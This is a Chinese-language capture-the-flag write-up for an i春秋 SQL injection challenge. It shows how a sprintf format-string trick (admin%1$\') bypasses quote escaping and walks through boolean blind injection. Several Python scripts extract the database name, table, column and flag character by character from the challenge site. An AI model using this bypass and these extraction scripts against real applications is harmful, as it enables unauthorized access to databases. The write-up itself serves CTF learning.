迎圣诞,拿大奖活动赛题_SQLi(sprintf格式化字符)

看题目应该就是注入没跑了

先拿正常输入试试,输了admin,admin,结果返回password error!,说明还真的存在admin账户

拿常规注入语句试探一下admin' and 1=1%23,发生了报错

迎圣诞,拿大奖活动赛题_SQLi(sprintf格式化字符)

红框这里就给了我们提示,记得之前遇上过一个sprintf格式化字符串所引起的漏洞

具体原理可以参考下面这篇文章

sprintf格式化字符串带来的注入隐患

先按照文中的方法拿admin%1$\' and 1=1%23进行尝试

迎圣诞,拿大奖活动赛题_SQLi(sprintf格式化字符)

结果返回了username error!,照一开始的测试来说,若and 1=1执行成功应该会返回password error!这里猜测and被和谐了

接着换成or语句试试

迎圣诞,拿大奖活动赛题_SQLi(sprintf格式化字符)

可以看到这里or语句被成功执行了,接下来就是盲注的时间了(就希望他后面别再过滤啥关键字了)

先看当前数据库的长度:

#coding:utf-8

import requests
import string dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="
right = 'password error!'
worry = 'username error!'
url = 'http://ad38630038fd4c87bd8e55c7bd876412d064d626a2e64cae.game.ichunqiu.com/'
for i in range(30):
key = "admin%1$\\' or " + "(length(database())=" + str(i) + ")#"
data = {'username':key, 'password':''}
r = requests.post(url, data=data).content
if right in str(r):
print('the length of database is %s' %i)

迎圣诞,拿大奖活动赛题_SQLi(sprintf格式化字符)

import requests
import string dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="
right = 'password error!'
worry = 'username error!'
url = 'http://ad38630038fd4c87bd8e55c7bd876412d064d626a2e64cae.game.ichunqiu.com/' database = ''
for j in range(1,4):
for each in dic:
key = "admin%1$\\' or " + "(ascii(substr(database(),%s,1))="%j + str(ord(each)) + ")#"
data = {'username':key, 'password':''}
r = requests.post(url, data=data).content
print(key)
if right in str(r):
database += each
print(each)
break
print('the name of database is %s'%database)

迎圣诞,拿大奖活动赛题_SQLi(sprintf格式化字符)

import requests
import string dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="
right = 'password error!'
worry = 'username error!'
url = 'http://ad38630038fd4c87bd8e55c7bd876412d064d626a2e64cae.game.ichunqiu.com/'
i = 1
while True:
key = "admin%1$\\' or " + "(select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=" + str(i) + "#"
data = {'username':key, 'password':''}
r = requests.post(url, data=data).content
print(r)
if right in str(r):
print('the length of tables is %s' %i)
break
i += 1

迎圣诞,拿大奖活动赛题_SQLi(sprintf格式化字符)

import requests
import string dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="
right = 'password error!'
worry = 'username error!'
url = 'http://335ba99138724fb9938bd2756b0c7ba5aba7efad86a84ab9.game.ichunqiu.com/'
table = ''
for i in range(1,5):
for j in dic:
key = "admin%1$\\' or " + "(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),%s,1))="%i + str(ord(j)) + ")#"
data = {'username':key, 'password':''}
r = requests.post(url, data=data).content
print(key)
if right in str(r):
table += j
print(j)
break
print('the name of table is %s'%table)

迎圣诞,拿大奖活动赛题_SQLi(sprintf格式化字符)

接下来的代码我就省略前面定义url、dic这些东西,直接给出判断语句(其实判断语句也很简单,拿着上面跑表的语句改改就好了)

i = 1
while True:
key = "admin%1$\\' or " + "(select length(column_name) from information_schema.columns where table_name=0x666c6167 limit 0,1)=" + str(i) + "#"
data = {'username':key, 'password':''}
r = requests.post(url, data=data).content
print(r)
if right in str(r):
print('the length of columns is %s' %i)
break
i += 1

迎圣诞,拿大奖活动赛题_SQLi(sprintf格式化字符)

column = ''
for i in range(1,5):
for j in dic:
key = "admin%1$\\' or " + "(ascii(substr((select column_name from information_schema.columns where table_name=0x666c6167 limit 0,1),%s,1))="%i + str(ord(j)) + ")#"
data = {'username':key, 'password':''}
r = requests.post(url, data=data).content
print(key)
if right in str(r):
column += j
print(j)
break
print('the name of column is %s'%column)

迎圣诞,拿大奖活动赛题_SQLi(sprintf格式化字符)

i = 1
while True:
key = "admin%1$\\' or " + "(select length(flag) from flag limit 0,1)=" + str(i) + "#"
data = {'username':key, 'password':''}
r = requests.post(url, data=data).content
print(key)
if right in str(r):
print('the length of data is %s' %i)
break
i += 1

迎圣诞,拿大奖活动赛题_SQLi(sprintf格式化字符)

flag = ''
for i in range(1,43):
for j in dic:
key = "admin%1$\\' or " + "(ascii(substr((select flag from flag limit 0,1),%s,1))="%i + str(ord(j)) + ")#"
data = {'username':key, 'password':''}
r = requests.post(url, data=data).content
print(key)
if right in str(r):
flag += j
print(j)
break
print('the flag is %s'%flag)

迎圣诞,拿大奖活动赛题_SQLi(sprintf格式化字符)

这题的关键还是要知道sprintf格式化字符的漏洞,后面的盲注并没有过滤相关的关键词,导致盲注起来没有压力

上一篇:虚拟机安装Centos6.5服务器系统


下一篇:sscanf,sprintf 通过字符串与其它类型进行方便快捷的输入和输出